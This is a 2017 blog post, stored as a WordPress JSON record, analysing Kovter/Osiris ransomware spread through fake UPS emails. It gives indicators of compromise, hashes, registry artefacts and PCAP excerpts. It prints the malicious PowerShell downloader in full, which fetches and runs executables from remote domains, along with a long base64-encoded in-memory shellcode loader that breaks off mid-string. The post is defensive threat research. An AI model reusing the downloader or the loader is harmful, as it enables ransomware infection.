{"id":716,"date":"2017-02-06T10:49:13","date_gmt":"2017-02-06T10:49:13","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=716"},"modified":"2017-02-06T11:29:19","modified_gmt":"2017-02-06T11:29:19","slug":"2017-02-06-kovterosiris-ups-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=716","title":{"rendered":"2017-02-06 Kovter\/Osiris UPS Malspam"},"content":{"rendered":"

A little late for this write-up, but here is an example of some Kovter\/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security’s blog post<\/a> which had the domains listed below. It looks as if they have been keeping tabs on these types of emails and the callbacks used as well.<\/p>\n

All artifacts from this investigation can be found in this Github repo located here<\/a>.<\/p>\n

The attack is a simple one; phishing emails sent to users suggesting that the person has a UPS shipment that has been shipped, or not delivered which then prompts them to act. The attachment being sent is a zip file, that once unzipped, is really LNK file which is made to look like a Word document. The attack is using the route of hiding the LNK file extension since the OS is only showing the DOC extension. Also within the shortcut text box there is some Powershell code as seen in the image below. Microsoft has an article talking about this attack vector which can be found here<\/a> and an updated article talking about the Kovter infection here<\/a>. All of this ends with the system being encrypted with Osiris.<\/p>\n

\"\"<\/a>
\n\"\"<\/a><\/p>\n

*Indicators of Compromise:*
\n50[.]62[.]238[.]1 \/ helpdeskng[.]com
\n194[.]31[.]59[.]5
\n128[.]1[.]191[.]207
\n104[.]247[.]149[.]240
\n48[.]176[.]164[.]247 (Port 8080)
\n28[.]194[.]116[.]44 (Port 8080)
\n193[.]75[.]133[.]172 (Port 8080)
\n77[.]44[.]38[.]70 (Port 8080)
\n60[.]193[.]66[.]163 (Port 8080)
\n72[.]64[.]109[.]208 (Port 8080)
\n14[.]47[.]201[.]123 (Port 8080)
\n74[.]220[.]211[.]62
\n189[.]177[.]220[.]156
\n38[.]123[.]253[.]210 (HTTPS)
\n128[.]1[.]191[.]207
\n38[.]123[.]253[.]210
\n40[.]135[.]7[.]195 (Port 8080)
\n40[.]213[.]139[.]241 (Port 8080)
\n131[.]168[.]180[.]20 (Port 8080)
\n39[.]205[.]100[.]112 (Port 8080)
\n97[.]167[.]78[.]47 (Port 8080)
\n21[.]69[.]102[.]34 (Port 8080)
\n28[.]246[.]201[.]182 (Port 8080)
\n169[.]6[.]96[.]39 (Port 8080)
\n83[.]102[.]201[.]113 (Port 8080)
\n143[.]152[.]100[.]215 (Port 8080)<\/p>\n

*Artifacts:*
\nFile name: a1.exe
\nFile size: 380KB
\nMD5 hash: fbe08cc20207d5c4f61757484568b9b0
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/bd9a3d09c31a034a9434a5f182624b70e418ed4421ee991069d3b47a156bd6ba\/analysis\/<\/a>
\nFirst submitted: 2017-02-03 00:46:14 UTC
\nDetection ratio: 18 \/ 56<\/p>\n

File name: a2.exe
\nFile size: 340KB
\nMD5 hash: f503802c3399f2f58c9a9fdeaffdd1f6
\nVirustotal: NA<\/p>\n

File name: c3046d01.e5782001b
\nFile size: 6KB
\nMD5 hash: 85445dde7246db5feef9f853c7aa05e1
\nVirustotal: NA<\/p>\n

File name: e7da1628.bat
\nFile size: 77B
\nMD5 hash: 65ab194835a57961575c64996f91e8c3
\nVirustotal: NA<\/p>\n

*Analysis of malware*
\nStarting from the system perspective, when executing the malicious LNK file which has the following Powershell code:<\/p>\n

\r\n"C:\\Windows\\System32\\WindowsPowerShell\\v1[.]0\\powershell[.]exe" -ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';function g($f){Start $f;};function z{return New-Object System[.]Net[.]WebClient;};$ld=0;$cs=[char]92;$fn=$env:temp+$cs;$dc=$fn+'a[.]doc';$c='';$q=New-Object System[.]Random;if(!(Test-Path $dc)){for($i=0;$i -lt 2000;$i++){$c=$c+[char]$q[.]Next(1,255);};$c | Out-File -FilePath $dc;};g($dc);$lk=$fn+'a[.]txt';$y=z;if(!(Test-Path $lk)){New-Item -Path $fn -Name 'a[.]txt' -ItemType File;for($n=1;$n -le 2;$n++){$f=$fn+'a'+$n+'[.]exe';$r='\/counter\/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n;for($i=$ld;$i -lt $ll[.]length;$i++){$u=$ll[$i]+$r;$u='http:\/\/'+$u;$y[.]DownloadFile($u,$f);if(Test-Path $f){$v=Get-Item $f;if($v[.]length -gt 10000){$ld=$i;g($f);break;};};};};};notepad[.]exe<\/pre>\n
it is what downloads the two files called “a1.exe” and “a2.exe” since the code references the URI of “‘\/counter\/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b’+$n” which looks to be in a loop, along with the code of “$f=$fn+’a’+$n+’.exe’;” giving the files their names once downloaded. This can also be seen in the PCAP:<\/p>\n
\r\nGET \/counter\/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b1 HTTP\/1.1\r\nHost: helpdeskng[.]com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 03 Feb 2017 08:49:35 GMT\r\nServer: Apache\r\nContent-Disposition: attachment; filename=f5.png\r\nContent-Length: 379904\r\nCache-Control: max-age=5184000\r\nExpires: Tue, 04 Apr 2017 08:49:35 GMT\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b2 HTTP\/1.1\r\nHost: helpdeskng[.]com\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 03 Feb 2017 08:49:36 GMT\r\nServer: Apache\r\nContent-Disposition: attachment; filename=868d.png\r\nContent-Length: 339777\r\nCache-Control: max-age=5184000\r\nExpires: Tue, 04 Apr 2017 08:49:36 GMT\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
\"\"<\/a><\/p>\n
During this time Word is opened up as well, but there does not seem to be anything malicious with it from what I can see.<\/p>\n
Once these files have been downloaded to the system, the “a1.exe” file is kicked off first and starts looking at different registry keys and file locations on the system and then shortly thereafter the “a2.exe” process is started and proceeds to look at different things within the registry and in the file system while setting registry values. For example:<\/p>\n
\r\nHKCU\\Software\\7GWsaAe\\GsDyqtU6qn\r\nType:\tREG_SZ\r\nLength:\t892,566\r\nData:\t\u00bf\u00cb\u00cdIB\u0153\u00fe\u2020\u201a\u2018\u00cf\u00ab\u00d6o\u2021\u00a9\u00b8u\u0178\u00b7PX\u00ac\u00a11z#B2|C\u00a4%\u00dc\u00b3$\u00bc_\u00ced\u00b7\u203a\u00e1\u00fe\u00d7\u00b8?\u00b6\u00ad\u00a0\u00fe\u00c1\u00a3M|\u00de|l\u02dc\u2122'\u0152E\u00d2\u00f7\u00e2\u00c0a\u00e7rPhFc\u00b6U\u0161es\u00b3U\u2039Y\u00ccLAp\u00bc@\u0152w>PUpV\u00e6\u00ff3\u00e9\u00bfQ\u00d19-2J\u00c19\u00a87\u00df\u0161\u00f5W{Y\u00f8\u00e5\u008d4s\u00dc\u00d7\u00e8,\u203a\u00cd\u00d0\u00a7\u00ceU\u201dL\u0178\u00e5\u00d4C\u00bcfw\u00da\u00e1Q\u00a1\u00fe\u0160\u00cd\u00ab\u00ae3\u2122\u0081\u2020\u00cbL\r\n\r\n-----\r\n\r\nPath: HKCU\\Software\\7GWsaAe\\xBQlLx\r\nType:\tREG_SZ\r\nLength:\t106,344\r\nData:\taZTXBoMIgZLfYPVj5NGKkBK="nYs38HRYT745axjeErGZ1";hrAOzPmKYqnW2QUxKmF="VCl6jqYtdcCslBoDb";vJVb1JPhBOyMqrWmJRBx="DCRdConVe2Huod7tA2jpIUxuXkbVFnXQBoYfdWXgoVQy";Fd8B="151E591E534F161E100F37672E411E37731F003D1F4A6B053D4A2801217110755E3B7D24183E75173C7A452628713F0278781F661232640E2505163E5B15720F315E3C6B7E751257290316173223321B2D173F2E20042443040C5169097C005B252B77306C510A11204B587E66017406010E0F1F04342D767E76005A193B2B022E5C5B1F1F41322062027A436F0D19132C041F0A18190D0A2008283D0607521A1901130B5E7B6C7028290C371E3877315215625A15233C1333022042001E7116106606017922361F1725150230530D1A0A250A4F771D36205F0106781E0E7C06283A1330033539252A3056644C0E360C6F21116C3F6C1E3E7F4F446B6001061B3310210F740B0B730A7C3D383C0E1523172B5A372D0C314C5D74146F631D143C147C0D0A003707653B0068253D4D387D484D271B2E07122E3D372C41390C107A2C7B3D25736E2628070916197D142A122A034A621F17105D1657142B173A0C7F5055011C78720C7B1E7009180D4B1F280A1D252F1A3F193B137D781B5C320F1E1B1C7534062F62000021521C08711B6432003B34222965683D095E5E343C34180A4005080D032C161839651C3E0C69l\r\n\r\n-----\r\n\r\nPath: HKLM\\SOFTWARE\\Wow6432Node\\lqoiarkklq\\lapxjqc\r\nType:\tREG_SZ\r\nLength:\t910,252\r\nData:\t$1W=\u00c5\u00e5\u0178\u00fb\u00ef\u017d\u00ac>\u00c5@\u00d0\u00f6B8\u00bd\u0192\u00af\u00af\u00d8eh\u00c2p9\u00d1:\u00e7\u00ee\u00cb\u00e7\u00fd\u201e\u017d]:\u00dc\u00dch\r\n\r\n-----\r\n\r\nPath: HKCU\\Software\\lqoiarkklq\\txpge\r\nType:\tREG_SZ\r\nLength:\t104,872\r\nData:\tJZroJd2gxMbrSBTJpvmp="CfcD7gwy0RQtl396CbCG9ydLoE";YFzuPrDl1WIVPNuoFtEFHuBL="sVAFCJ4pbaOR0g9zsiLtZ4JFnIrTZ4HPXIfB99Oll";KZcwv8urWPpecoi2MAAU="HOWjlqH30Ja5Hy5S6djKoTme43AMVgwQOh4bn82RI3tEP9Q";dISBmzqXpuqXEiT0Yx="vB6EXz5fPclmVDTCwBRTYyglpTHZNSns88saBbp4H";O4oUMKfohXdbFHOHluMs7v="NiKtr4ds0JP7rDokSjaYH32SKl1ud8a02J";nRvfucl0mnbmtVCoYKkLaCv="KsfhOr8tfAOhUEjDdI8Pv75noMhmbMSBTITAIyGbnze";WWzxToRttSpb7OJXj7FhRf="Nbd8efU5ArtYWp4ulpRDrGUJzinSWVVz096QrMT4mWLwL";PLyiIuCPJovOeDLujY4LeMe="e5te7kFWHrvPAWF0dVNqNmTBcY1YPzRJvlxNsoz7hA3AaJ";VEc1="317B3C38735B2E2F013565301C12094B0E231B39270A7B0F0F061E1F742F1176652349571D1E553662612C7E7E392C3703060218300F66533F3A101D006045693130203039173106491D14357505117D3D204F183E1D6E5B3B1338303207015A0622074E102A10271E297B2B70755B1C3952503127051C2531703D2439091C1E2C212713196006715A3E201425101C3114333B150B3A15130C383C210E001D13762928240230651014132C7A675920280A4C34231036051F1960637E0065570855474D4C2831322F362621017A7B69527D4101073B7F45212C2647131620130110193D371B0139056D571E621B065C181E4B0011320l<\/pre>\n
At this time I can not be for certain what the purpose of each of these files are, and if their purpose is completely different or if they have aspects of overlap to them. The only thing that is apparent to me at this time is the fact that the a1.exe process is the main process that encrypts the files on the system, where the a2.exe process is not handling the encryption and seems to be handling the persistence part of this infection.  <\/p>\n
The Powershell script also kicks off two other processes (both are regsvr32.exe) which is used to create persistence on the now infected system via some registry keys and on the file system, but to also keep an open connection to the C2 systems. <\/p>\n
\"\"<\/a><\/p>\n
The interesting thing about one of these regsvr32.exe processes (PID 612) is that there is the following block of code that has been base64 encoded when the process is started from it’s parent:<\/p>\n
\r\nAPPDATA=C:\\Users\\Administrator\\AppData\\Roaming\r\n\taykqh=iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('I2F2b2Jtc2p2dWNqdW9jeHVua2FqdXZvZ2liZGNta2VxcA0Kc2xlZXAoMTUpO3RyeXsNCiN3cWR5bw0KZnVuY3Rpb24gZ2RlbGVnYXRlew0KI2ZkZmZmZXBxb28NClBhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7DQojZ2t0ZnJiag0KJFR5cGVCdWlsZGVyPVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgoTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoIlJlZmxlY3RlZERlbGVnYXRlIikpLFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgiSW5NZW1vcnlNb2R1bGUiLCRmYWxzZSkuRGVmaW5lVHlwZSgiWFhYIiwiQ2xhc3MsUHVibGljLFNlYWxlZCxBbnNpQ2xhc3MsQXV0b0NsYXNzIixbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSk7DQojbndia2NpDQokVHlwZUJ1aWxkZXIuRGVmaW5lQ29uc3RydWN0b3IoIlJUU3BlY2lhbE5hbWUsSGlkZUJ5U2lnLFB1YmxpYyIsW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCRQYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCJSdW50aW1lLE1hbmFnZWQiKTsNCiN0aGxyDQokVHlwZUJ1aWxkZXIuRGVmaW5lTWV0aG9kKCJJbnZva2UiLCJQdWJsaWMsSGlkZUJ5U2lnLE5ld1Nsb3QsVmlydHVhbCIsJFJldHVyblR5cGUsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOw0KI2N4eXd6ZmwNCnJldHVybiAkVHlwZUJ1aWxkZXIuQ3JlYXRlVHlwZSgpO30NCiNhbGtmcHlpanFsDQpmdW5jdGlvbiBncHJvY3sNCiNta2xlbGRzZmNsDQpQYXJhbSAoW1BhcmFtZXRlcihQb3NpdGlvbj0wLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRNb2R1bGUsW1BhcmFtZXRlcihQb3NpdGlvbj0xLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRQcm9jZWR1cmUpOw0KI2JwbmllDQokU3lzdGVtQXNzZW1ibHk9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpfFdoZXJlLU9iamVjdHskXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlwiKVstMV0uRXF1YWxzKCJTeXN0ZW0uZGxsIil9Ow0KI3Zkem5pZ2sNCiRVbnNhZmVOYXRpdmVNZXRob2RzPSRTeXN0ZW1Bc3NlbWJseS5HZXRUeXBlKCJNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcyIpOw0KI2p1dHZiaXcNCnJldHVybiAkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldFByb2NBZGRyZXNzIikuSW52b2tlKCRudWxsLEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCRVbnNhZmVOYXRpdmVNZXRob2RzLkdldE1ldGhvZCgiR2V0TW9kdWxlSGFuZGxlIikuSW52b2tlKCRudWxsLEAoJE1vZHVsZSkpKSksJFByb2NlZHVyZSkpO30NCiNpY2Vib2ZuYw0KW0J5dGVbXV0gJHNjMzIgPSAweDU1LDwjcnByIz4weDhCLDB4RUMsPCNqaSM+MHg4MSwweEM0LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MywweDU2LDB4NTcsMHg1MywweDU2LDB4NTcsMHhGQywweDMxLDB4RDIsMHg2NCwweDhCLDwjYXR3Iz4weDUyLDB4MzAsMHg4QiwweDUyLDwjYmVwIz4weDBDLDB4OEIsMHg1MiwweDE0LDB4OEIsMHg3MiwweDI4LDB4NkEsMHgxOCwweDU5LDB4MzEsMHhGRiwweDMxLDB4QzAsPCNjY2QjPjB4QUMsMHgzQywweDYxLDB4N0MsMHgwMiwweDJDLDB4MjAsMHhDMSwweENGLDB4MEQsMHgwMSwweEM3LDB4RTIsMHhGMCwweDgxLDB4RkYsMHg1QiwweEJDLDB4NEEsMHg2QSwweDhCLDB4NUEsMHgxMCwweDhCLDB4MTIsMHg3NSwweERCLDB4ODksPCNybyM+MHg1RCwweEZDLDwjc2MjPjB4NUYsMHg1RSwweDVCLDB4OEIsMHg0NSwweEZDLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHgwRiw8I2N3Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhGQywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsPCNscGojPjB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4OSwweDQ1LDB4RDAsMHg4QiwweDQ1LDB4RDAsMHg4MSwweDM4LDB4NTAsMHg0NSwweDAwLDB4MDAsMHgwRiwweDg1LDB4RTUsMHgwMSwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsPCNxa3EjPjB4OEIsMHg0MCwweDc4LDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweENDLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDE4LDB4ODUsMHhDMCwweDBGLDwjYXQjPjB4OEMsMHhDQiwweDAxLDB4MDAsMHgwMCwweDQwLDB4ODksMHg4NSw8I254ZyM+MHgzQywweEZGLDB4RkYsMHhGRiwweDMzLDB4RjYsMHg4QiwweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyMCwweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsPCNsY2IjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHg0RCwweEZDLDB4ODEsMHgzOSwweDRDLDB4NkYsMHg2MSwweDY0LDB4NzUsMHg1NiwweDhELDB4NDEsMHgwNCwweDgxLDB4MzgsMHg0Qyw8I29sciM+MHg2OSwweDYyLDB4NzIsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDYxLDB4NzIsMHg3OSwweDQxLDwjbmEjPjB4NzUsMHg0MCwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDwjeHRnIz4weDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsPCNpZ2UjPjB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDB4MDMsMHhEMCwweDhCLDB4MDIsMHgwMywweDQ1LDB4RkMsMHg4OSwweDQ1LDB4QkMsPCN1c3IjPjB4ODEsMHgzOSwweDQ3LDB4NjUsMHg3NCwweDUwLDwjbmZ6Iz4weDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDwjY3AjPjB4NzIsMHg2RiwweDYzLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCw8I2pvIz4weDY0LDB4NjQsMHg3MiwweDY1LDB4NzUsMHg0MCwweDhELDB4NDEsMHgwRSwweDgwLDB4MzgsMHgwMCw8I3NicyM+MHg3NSwweDM4LDB4OEIsPCNhYyM+MHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHg0NSwweEZDLDB4MzMsMHhEMiw8I2RkIz4weDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsPCN2dWUjPjB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCw8I2x4Iz4weDAyLDB4MDMsPCNwaGEjPjB4RDAsMHg4Qiw8I3N0Iz4weDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweEI4LDwjb2FpIz4weDgxLDB4MzksMHg1NiwweDY5LDB4NzIsMHg3NCwweDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzUsMHg2MSwweDZDLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsPCN1bXMjPjB4MzgsPCN2enojPjB4NkMsMHg2QywweDZGLDB4NjMsMHg3NSwweDQwLDB4OEQsPCN1dSM+MHg0MSwweDBDLDB4ODAsMHgzOCwweDAwLDB4NzUsMHgzOCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyNCwweDAzLDB4NDUsPCNqcHgjPjB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDB4OEIsMHgwMCwweDhCLDB4NTUsMHhDQywweDhCLDB4NTIsMHgxQywweDAzLDB4NTUsMHhGQywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSw8I3N4cyM+MHhBOCwweDgxLDB4MzksPCNrZGsjPjB4NDUsMHg3OCwweDY5LDB4NzQsMHg3NSwweDYzLDB4OEQsMHg0MSwweDA0LDwjaXdqIz4weDgxLDwjd255Iz4weDM4LDB4NTAsMHg3MiwweDZGLDB4NjMsMHg3NSwweDU4LDB4OEQsPCNtcGwjPjB4NDEsMHgwOCwweDgwLDB4MzgsMHg2NSwweDc1LDB4NTAsMHg4RCwweDQxLDB4MDksMHg4MCwweDM4LDB4NzMsMHg3NSwweDQ4LDB4OEQsMHg0MSwweDBBLDB4ODAsMHgzOCwweDczLDB4NzUsMHg0MCwweDgzLDB4QzEsMHgwQiw8I2VvIz4weDgwLDB4MzksMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsPCN4engjPjB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjYngjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweDU1LDwjbWV5Iz4weEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDwjZWJoIz4weDAzLDB4RDAsPCNxeWwjPjB4OEIsMHgwMiwweDAzLDB4NDUsMHhGQywweDg5LDB4NDUsMHhBNCwweDQ2LDB4RkYsMHg4RCwweDNDLDB4RkYsMHhGRiwweEZGLDwjZG5pIz4weDBGLDB4ODUsMHgzRSwweEZFLDB4RkYsMHhGRiw8I3FuIz4weEM2LDB4ODUsMHgyRiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHhDNiwweDg1LDB4MzEsMHhGRiwweEZGLDB4RkYsMHg3NiwweEM2LDB4ODUsMHgzMiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMzLDB4RkYsMHhGRiwweEZGLDB4NzAsMHhDNiwweDg1LDB4MzQsMHhGRiwweEZGLDB4RkYsMHg2OSwweEM2LDB4ODUsMHgzNSwweEZGLDB4RkYsMHhGRiwweDMzLDB4QzYsMHg4NSw8I216ZiM+MHgzNiwweEZGLDB4RkYsMHhGRiwweDMyLDwjbGQjPjB4QzYsMHg4NSwweDM3LDB4RkYsMHhGRiwweEZGLDB4MkUsMHhDNiwweDg1LDB4MzgsMHhGRiwweEZGLDB4RkYsMHg2NCwweEM2LDB4ODUsMHgzOSwweEZGLDB4RkYsMHhGRiwweDZDLDB4QzYsMHg4NSwweDNBLDB4RkYsPCNsYnIjPjB4RkYsMHhGRiwweDZDLDwjcHUjPjB4QzYsMHg4NSwweDNCLDB4RkYsMHhGRiwweEZGLDB4MDAsMHg4RCwweDg1LDB4MkYsMHhGRiwweEZGLDB4RkYsMHg1MCwweEZGLDB4NTUsMHhCQywweDhCLDB4RDgsMHg4NSwweERCLDB4NzUsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4OSwweDVELDB4RDQsMHg4QiwweDQ1LDB4RDQsMHg2NiwweDgxLDB4MzgsMHg0RCwweDVBLDB4MEYsMHg4NSwweDRGLDB4MDEsMHgwMCwweDAwLDB4OEIsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweEQ0LDB4OEIsMHg0MCwweDNDLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHgyNiwweDAxLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NDAsMHg3OCwweDAzLDB4QzMsMHg4OSwweDQ1LDB4Q0MsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MTgsMHg4NSwweEMwLDB4MEYsMHg4QywweDBELDB4MDEsMHgwMCwweDAwLDB4NDAsMHg4OSwweDg1LDB4M0MsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEIsMHhDMyw8I3RoIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDIwLDwja3NrIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjdWF6Iz4weDA0LDB4ODMsMHhDNCwweDA4LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHhDQiwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg0RiwweDc1LDB4NUIsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzAsMHg2NSwweDZFLDB4NEIsMHg3NSwweDUwLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDY1LDB4NzksMHg0NSwweDc4LDB4NzUsMHg0NSwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHg0MSwweDc1LDB4M0QsMHg4RCwweDQxLDB4MEQsMHg4MCwweDM4LDB4MDAsMHg3NSwweDM1LDwjdHgjPjB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweDAzLDB4QzAsMHg5OSwweDAzLDB4MDQsMHgyNCwweDEzLDB4NTQsMHgyNCwweDA0LDB4ODMsMHhDNCwweDA4LDB4NjYsMHg4QiwweDAwLDB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHhEMywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHhDMywweDg5LDB4NDUsMHhCMCwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg1MSwweDc1LDB4NUUsMHg4RCw8I25pdSM+MHg0MSwweDA0LDB4ODEsMHgzOCw8I2prIz4weDc1LDB4NjUsMHg3Miw8I2xxIz4weDc5LDB4NzUsMHg1MywweDhELDB4NDEsMHgwOCwweDgxLDB4MzgsMHg1NiwweDYxLDB4NkMsMHg3NSwweDc1LDB4NDgsMHg4RCwweDQxLDB4MEMsMHg4MSwweDM4